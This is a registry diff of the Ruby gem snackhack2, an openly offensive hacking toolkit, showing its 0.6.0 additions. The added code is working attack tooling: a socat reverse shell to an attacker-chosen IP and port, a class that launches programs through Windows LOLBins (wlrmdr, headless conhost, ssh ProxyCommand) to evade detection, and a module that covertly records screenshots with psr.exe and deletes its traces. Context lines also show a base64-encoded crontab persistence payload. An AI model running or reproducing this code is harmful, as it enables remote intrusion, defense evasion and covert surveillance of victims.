snackhack2 0.5.0 → 0.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/snackhack2/indirect_command_injection.rb +27 -0
- data/lib/snackhack2/portscan.rb +1 -1
- data/lib/snackhack2/reverse_shell.rb +6 -0
- data/lib/snackhack2/screenshots.rb +21 -0
- data/lib/snackhack2/version.rb +1 -1
- data/lib/snackhack2.rb +3 -0
- metadata +4 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 91c1c06a465134768119913da56c3cd2431d523bbba508d40247e4ac35b58080
|
|
4
|
+
data.tar.gz: e40b136a7b30a151e4a72e0a783399ea08196dfe9ede37df8a6baba1116e1c9a
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 4fd58e1fbbe4f408ccd002ca9d3581c92308d1ab05c8147a978d502b782d67c5e867cbed43c76d8b99ba7dcd8413555b6ec65e270797688791baf2e36c02b14f
|
|
7
|
+
data.tar.gz: ee3506348b912fc05319b5be0f22699ca780f47cf471060dcb6d41685f4607be709de140356331249309de2d768554853a4c536ec67836e338be5731681a5866
|
|
@@ -0,0 +1,27 @@
|
|
|
1
|
+
module Snackhack2
|
|
2
|
+
class CommandInjection
|
|
3
|
+
attr_accessor :exe, :title, :prompt
|
|
4
|
+
def initialize
|
|
5
|
+
@exe = "calc.exe"
|
|
6
|
+
@title = "Click me!"
|
|
7
|
+
@prompt = "To run calculator"
|
|
8
|
+
end
|
|
9
|
+
def wlrmdr_With_prompt
|
|
10
|
+
Process.spawn("wlrmdr.exe -s 3600 -f 0 -t #{title} -m #{@prompt} -a 10 -u #{@exe}")
|
|
11
|
+
end
|
|
12
|
+
def wlrmdr_without_prompt
|
|
13
|
+
Process.spawn("wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u #{@exe}")
|
|
14
|
+
end
|
|
15
|
+
def conhost
|
|
16
|
+
Process.spawn("conhost.exe #{@exe}")
|
|
17
|
+
end
|
|
18
|
+
def conhost_hide
|
|
19
|
+
# Specify --headless parameter to hide child process window (if applicable)
|
|
20
|
+
Process.spawn("conhost.exe --headless #{@exe}")
|
|
21
|
+
def ssh
|
|
22
|
+
Process.spawn("ssh -o ProxyCommand=#{@exe} .")
|
|
23
|
+
end
|
|
24
|
+
end
|
|
25
|
+
end
|
|
26
|
+
|
|
27
|
+
|
data/lib/snackhack2/portscan.rb
CHANGED
|
@@ -18,5 +18,11 @@ module Snackhack2
|
|
|
18
18
|
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
19
19
|
puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
|
|
20
20
|
end
|
|
21
|
+
def bash
|
|
22
|
+
c = %Q{
|
|
23
|
+
bash.exe -c "socat tcp-connect:#{@ip}:#{@port} exec:sh,pty,stderr,setsid,sigint,sane"
|
|
24
|
+
}
|
|
25
|
+
Process.spawn(c)
|
|
26
|
+
end
|
|
21
27
|
end
|
|
22
28
|
end
|
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
require 'shellwords'
|
|
2
|
+
module Snackhack2
|
|
3
|
+
class ScreenShot
|
|
4
|
+
attr_accessor :zip, :time
|
|
5
|
+
# https://lolbas-project.github.io/lolbas/Binaries/Psr/
|
|
6
|
+
def initialize
|
|
7
|
+
@zip = "screenshots.zip"
|
|
8
|
+
@time = 60
|
|
9
|
+
end
|
|
10
|
+
def run
|
|
11
|
+
File.open("lol.bat", 'w+') { |file| file.write("psr.exe /start /output #{@zip} /sc 1 /gui 0") }
|
|
12
|
+
File.open("lol2.bat", 'w+') { |file| file.write("psr.exe /stop") }
|
|
13
|
+
Process.spawn("lol.bat")
|
|
14
|
+
sleep @time.to_i
|
|
15
|
+
system("lol2.bat")
|
|
16
|
+
sleep 2
|
|
17
|
+
File.delete("lol.bat")
|
|
18
|
+
File.delete("lol2.bat")
|
|
19
|
+
end
|
|
20
|
+
end
|
|
21
|
+
end
|
data/lib/snackhack2/version.rb
CHANGED
data/lib/snackhack2.rb
CHANGED
|
@@ -26,6 +26,9 @@ require_relative 'snackhack2/tomcat'
|
|
|
26
26
|
require_relative 'snackhack2/subdomains2'
|
|
27
27
|
require_relative 'snackhack2/reverse_shell'
|
|
28
28
|
require_relative 'snackhack2/forward_remote'
|
|
29
|
+
require_relative 'snackhack2/screenshots'
|
|
30
|
+
require_relative 'snackhack2/indirect_command_injection'
|
|
31
|
+
|
|
29
32
|
module Snackhack2
|
|
30
33
|
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
|
|
31
34
|
def self.read_serverversion
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: snackhack2
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.6.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- mike
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-
|
|
11
|
+
date: 2024-09-02 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: httparty
|
|
@@ -68,6 +68,7 @@ files:
|
|
|
68
68
|
- lib/snackhack2/emails.rb
|
|
69
69
|
- lib/snackhack2/forward_remote.rb
|
|
70
70
|
- lib/snackhack2/google_analytics.rb
|
|
71
|
+
- lib/snackhack2/indirect_command_injection.rb
|
|
71
72
|
- lib/snackhack2/iplookup.rb
|
|
72
73
|
- lib/snackhack2/lists/sshbrute.txt
|
|
73
74
|
- lib/snackhack2/lists/subdomains.txt
|
|
@@ -75,6 +76,7 @@ files:
|
|
|
75
76
|
- lib/snackhack2/portscan.rb
|
|
76
77
|
- lib/snackhack2/reverse_shell.rb
|
|
77
78
|
- lib/snackhack2/robots.rb
|
|
79
|
+
- lib/snackhack2/screenshots.rb
|
|
78
80
|
- lib/snackhack2/sitemap.rb
|
|
79
81
|
- lib/snackhack2/sshbrute.rb
|
|
80
82
|
- lib/snackhack2/subdomains.rb
|